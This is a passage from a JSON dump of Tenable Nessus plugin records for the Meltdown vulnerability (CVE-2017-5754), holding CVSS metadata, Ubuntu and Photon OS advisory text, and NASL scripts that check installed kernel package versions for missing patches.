attacks. This flaw is known as Meltdown. A local attacker could use this to expose sensitive information, including kernel memory.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Ubuntu security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"exploitabilityScore": 1.1, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "CHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 5.6, "vectorString": "CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:C/C:H/I:N/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 4.0}, "published": "2018-01-11T00:00:00", "type": "nessus", "title": "Ubuntu 16.04 LTS : linux regression (USN-3522-3) (Meltdown)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.7, "vectorString": "AV:L/AC:M/Au:N/C:C/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5754"], "modified": "2023-01-12T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:linux-image-4.4-generic", "p-cpe:/a:canonical:ubuntu_linux:linux-image-4.4-lowlatency", "p-cpe:/a:canonical:ubuntu_linux:linux-image-generic", "p-cpe:/a:canonical:ubuntu_linux:linux-image-lowlatency", "cpe:/o:canonical:ubuntu_linux:16.04"], "id": "UBUNTU_USN-3522-3.NASL", "href": "https://www.tenable.com/plugins/nessus/105745", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-3522-3. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(105745);\n script_version(\"3.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/01/12\");\n\n script_cve_id(\"CVE-2017-5754\");\n script_xref(name:\"USN\", value:\"3522-3\");\n script_xref(name:\"IAVA\", value:\"2018-A-0019\");\n\n script_name(english:\"Ubuntu 16.04 LTS : linux regression (USN-3522-3) (Meltdown)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"USN-3522-1 fixed a vulnerability in the Linux kernel to address\nMeltdown (CVE-2017-5754). Unfortunately, that update introduced a\nregression where a few systems failed to boot successfully. This\nupdate fixes the problem.\n\nWe apologize for the inconvenience.\n\nJann Horn discovered that microprocessors utilizing speculative\nexecution and indirect branch prediction may allow unauthorized memory\nreads via sidechannel attacks. This flaw is known as Meltdown. A local\nattacker could use this to expose sensitive information, including\nkernel memory.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/3522-3/\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:M/Au:N/C:C/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:C/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.4-generic\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.4-lowlatency\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-generic\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-lowlatency\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:16.04\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/01/04\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/01/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/01/11\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2018-2023 Canonical, Inc. / NASL script (C) 2018-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"ksplice.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nvar release = chomp(release);\nif (! preg(pattern:\"^(16\\.04)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 16.04\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'Ubuntu', cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2017-5754\");\n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for USN-3522-3\");\n }\n else\n {\n _ubuntu_report = ksplice_reporting_text();\n }\n}\n\nvar flag = 0;\n\nif (ubuntu_check(osver:\"16.04\", pkgname:\"linux-image-4.4.0-109-generic\", pkgver:\"4.4.0-109.132\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"linux-image-4.4.0-109-lowlatency\", pkgver:\"4.4.0-109.132\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"linux-image-generic\", pkgver:\"4.4.0.109.114\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"linux-image-lowlatency\", pkgver:\"4.4.0.109.114\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n var tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"linux-image-4.4-generic / linux-image-4.4-lowlatency / etc\");\n}\n", "cvss": {"score": 4.7, "vector": "AV:L/AC:M/Au:N/C:C/I:N/A:N"}}, {"lastseen": "2023-01-30T14:42:00", "description": "USN-3522-2 fixed a vulnerability in the Linux Hardware Enablement kernel for Ubuntu 14.04 LTS to address Meltdown (CVE-2017-5754).\nUnfortunately, that update introduced a regression where a few systems failed to boot successfully. This update fixes the problem.\n\nWe apologize for the inconvenience.\n\nJann Horn discovered that microprocessors utilizing speculative execution and indirect branch prediction may allow unauthorized memory reads via sidechannel attacks. This flaw is known as Meltdown. A local attacker could use this to expose sensitive information, including kernel memory.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Ubuntu security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"exploitabilityScore": 1.1, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "CHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 5.6, "vectorString": "CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:C/C:H/I:N/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 4.0}, "published": "2018-01-11T00:00:00", "type": "nessus", "title": "Ubuntu 14.04 LTS : linux-lts-xenial regression (USN-3522-4) (Meltdown)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.7, "vectorString": "AV:L/AC:M/Au:N/C:C/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5754"], "modified": "2023-01-12T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:linux-image-4.4-generic", "p-cpe:/a:canonical:ubuntu_linux:linux-image-4.4-lowlatency", "p-cpe:/a:canonical:ubuntu_linux:linux-image-generic-lts-xenial", "p-cpe:/a:canonical:ubuntu_linux:linux-image-lowlatency-lts-xenial", "cpe:/o:canonical:ubuntu_linux:14.04"], "id": "UBUNTU_USN-3522-4.NASL", "href": "https://www.tenable.com/plugins/nessus/105746", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-3522-4. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(105746);\n script_version(\"3.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/01/12\");\n\n script_cve_id(\"CVE-2017-5754\");\n script_xref(name:\"USN\", value:\"3522-4\");\n script_xref(name:\"IAVA\", value:\"2018-A-0019\");\n\n script_name(english:\"Ubuntu 14.04 LTS : linux-lts-xenial regression (USN-3522-4) (Meltdown)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"USN-3522-2 fixed a vulnerability in the Linux Hardware Enablement\nkernel for Ubuntu 14.04 LTS to address Meltdown (CVE-2017-5754).\nUnfortunately, that update introduced a regression where a few systems\nfailed to boot successfully. This update fixes the problem.\n\nWe apologize for the inconvenience.\n\nJann Horn discovered that microprocessors utilizing speculative\nexecution and indirect branch prediction may allow unauthorized memory\nreads via sidechannel attacks. This flaw is known as Meltdown. A local\nattacker could use this to expose sensitive information, including\nkernel memory.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/3522-4/\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:M/Au:N/C:C/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:C/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.4-generic\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.4-lowlatency\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-generic-lts-xenial\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-lowlatency-lts-xenial\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:14.04\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/01/04\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/01/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/01/11\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2018-2023 Canonical, Inc. / NASL script (C) 2018-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"ksplice.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nvar release = chomp(release);\nif (! preg(pattern:\"^(14\\.04)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 14.04\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'Ubuntu', cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2017-5754\");\n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for USN-3522-4\");\n }\n else\n {\n _ubuntu_report = ksplice_reporting_text();\n }\n}\n\nvar flag = 0;\n\nif (ubuntu_check(osver:\"14.04\", pkgname:\"linux-image-4.4.0-109-generic\", pkgver:\"4.4.0-109.132~14.04.1\")) flag++;\nif (ubuntu_check(osver:\"14.04\", pkgname:\"linux-image-4.4.0-109-lowlatency\", pkgver:\"4.4.0-109.132~14.04.1\")) flag++;\nif (ubuntu_check(osver:\"14.04\", pkgname:\"linux-image-generic-lts-xenial\", pkgver:\"4.4.0.109.92\")) flag++;\nif (ubuntu_check(osver:\"14.04\", pkgname:\"linux-image-lowlatency-lts-xenial\", pkgver:\"4.4.0.109.92\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n var tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"linux-image-4.4-generic / linux-image-4.4-lowlatency / etc\");\n}\n", "cvss": {"score": 4.7, "vector": "AV:L/AC:M/Au:N/C:C/I:N/A:N"}}, {"lastseen": "2023-01-30T14:42:01", "description": "Jann Horn discovered that microprocessors utilizing speculative execution and indirect branch prediction may allow unauthorized memory reads via sidechannel attacks. This flaw is known as Meltdown. A local attacker could use this to expose sensitive information, including kernel memory.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Ubuntu security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"exploitabilityScore": 1.1, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "CHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 5.6, "vectorString": "CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:C/C:H/I:N/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 4.0}, "published": "2018-01-10T00:00:00", "type": "nessus", "title": "Ubuntu 16.04 LTS : linux, linux-aws, linux-euclid, linux-kvm vulnerability (USN-3522-1) (Meltdown)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.7, "vectorString": "AV:L/AC:M/Au:N/C:C/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5754"], "modified": "2023-01-12T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:linux-image-4.4-aws", "p-cpe:/a:canonical:ubuntu_linux:linux-image-4.4-euclid", "p-cpe:/a:canonical:ubuntu_linux:linux-image-4.4-generic", "p-cpe:/a:canonical:ubuntu_linux:linux-image-4.4-kvm", "p-cpe:/a:canonical:ubuntu_linux:linux-image-4.4-lowlatency", "p-cpe:/a:canonical:ubuntu_linux:linux-image-aws", "p-cpe:/a:canonical:ubuntu_linux:linux-image-euclid", "p-cpe:/a:canonical:ubuntu_linux:linux-image-generic", "p-cpe:/a:canonical:ubuntu_linux:linux-image-kvm", "p-cpe:/a:canonical:ubuntu_linux:linux-image-lowlatency", "cpe:/o:canonical:ubuntu_linux:16.04"], "id": "UBUNTU_USN-3522-1.NASL", "href": "https://www.tenable.com/plugins/nessus/105724", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-3522-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(105724);\n script_version(\"3.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/01/12\");\n\n script_cve_id(\"CVE-2017-5754\");\n script_xref(name:\"USN\", value:\"3522-1\");\n script_xref(name:\"IAVA\", value:\"2018-A-0019\");\n\n script_name(english:\"Ubuntu 16.04 LTS : linux, linux-aws, linux-euclid, linux-kvm vulnerability (USN-3522-1) (Meltdown)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"Jann Horn discovered that microprocessors utilizing speculative\nexecution and indirect branch prediction may allow unauthorized memory\nreads via sidechannel attacks. This flaw is known as Meltdown. A local\nattacker could use this to expose sensitive information, including\nkernel memory.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/3522-1/\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:M/Au:N/C:C/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:C/C:H/I:N/A:N\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.4-aws\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.4-euclid\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.4-generic\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.4-kvm\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-4.4-lowlatency\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-aws\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-euclid\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-generic\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-kvm\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-lowlatency\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:16.04\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/01/04\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/01/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/01/10\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2018-2023 Canonical, Inc. / NASL script (C) 2018-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"ksplice.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nvar release = chomp(release);\nif (! preg(pattern:\"^(16\\.04)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 16.04\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nvar cpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'Ubuntu', cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2017-5754\");\n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for USN-3522-1\");\n }\n else\n {\n _ubuntu_report = ksplice_reporting_text();\n }\n}\n\nvar flag = 0;\n\nif (ubuntu_check(osver:\"16.04\", pkgname:\"linux-image-4.4.0-1015-kvm\", pkgver:\"4.4.0-1015.20\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"linux-image-4.4.0-1047-aws\", pkgver:\"4.4.0-1047.56\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"linux-image-4.4.0-108-generic\", pkgver:\"4.4.0-108.131\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"linux-image-4.4.0-108-lowlatency\", pkgver:\"4.4.0-108.131\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"linux-image-4.4.0-9021-euclid\", pkgver:\"4.4.0-9021.22\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"linux-image-aws\", pkgver:\"4.4.0.1047.49\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"linux-image-euclid\", pkgver:\"4.4.0.9021.21\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"linux-image-generic\", pkgver:\"4.4.0.108.113\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"linux-image-kvm\", pkgver:\"4.4.0.1015.15\")) flag++;\nif (ubuntu_check(osver:\"16.04\", pkgname:\"linux-image-lowlatency\", pkgver:\"4.4.0.108.113\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n var tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"linux-image-4.4-aws / linux-image-4.4-euclid / etc\");\n}\n", "cvss": {"score": 4.7, "vector": "AV:L/AC:M/Au:N/C:C/I:N/A:N"}}, {"lastseen": "2023-01-30T14:54:14", "description": "An update of [linux] packages for PhotonOS has been released. This kernel update fixes vulnerability [CVE-2017-5754](https://web.nvd.nist .gov/view/vuln/detail?vulnId=CVE-2017-5754) which is commonly known as Meltdown vulnerability.", "cvss3": {"exploitabilityScore": 1.1, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "CHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 5.6, "vectorString": "CVSS:3.0/AV:L/AC:H/PR:L/UI:N/S:C/C:H/I:N/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 4.0}, "published": "2018-08-17T00:00:00", "type": "nessus", "title": "Photon OS 1.0: Linux PHSA-2018-1.0-0097 (deprecated)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.4, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.7, "vectorString": "AV:L/AC:M/Au:N/C:C/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-5754"], "modified": "2019-04-05T00:00:00", "cpe": ["p-cpe:/a:vmware:photonos:linux", "cpe:/o:vmware:photonos:1.0"], "id": "PHOTONOS_PHSA-2018-1_0-0097.NASL", "href": "https://www.tenable.com/plugins/nessus/111909", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# @DEPRECATED@\n#\n# Disabled on 2/7/2019\n#\n\n# The descriptive text and package checks in this plugin were\n# extracted from VMware Security Advisory PHSA-2018-1.0-0097. The text\n# itself is copyright (C) VMware, Inc.\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(111909);\n script_version(\"1.5\");\n script_cvs_date(\"Date: 2019/04/05 23:25:07\");\n\n script_cve_id(\"CVE-2017-5754\");\n\n script_name(english:\"Photon OS 1.0: Linux PHSA-2018-1.0-0097 (deprecated)\");\n script_summary(english:\"Checks the rpm output for the updated packages.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"This plugin has been deprecated.\");\n script_set_attribute(attribute:\"description\", value:\n\"An update of [linux] packages for PhotonOS has been released. This\nkernel update fixes vulnerability [CVE-2017-5754](https://web.nvd.nist\n.gov/view/vuln/detail?vulnId=CVE-2017-5754) which is commonly known as\nMeltdown vulnerability.\");\n # https://github.com/vmware/photon/wiki/Security-Updates-1.0-97\n script_set_attribute(attribute:\"see_also\", 